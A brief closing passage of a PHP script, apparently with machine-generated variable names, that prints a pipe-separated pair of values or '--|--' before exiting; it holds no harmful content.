												}
								}
								else
								{
												echo "--|--";
												exit( );
								}
								echo $R0d9f8f778c."|".$R413a5bdd03;
				}

}

?>
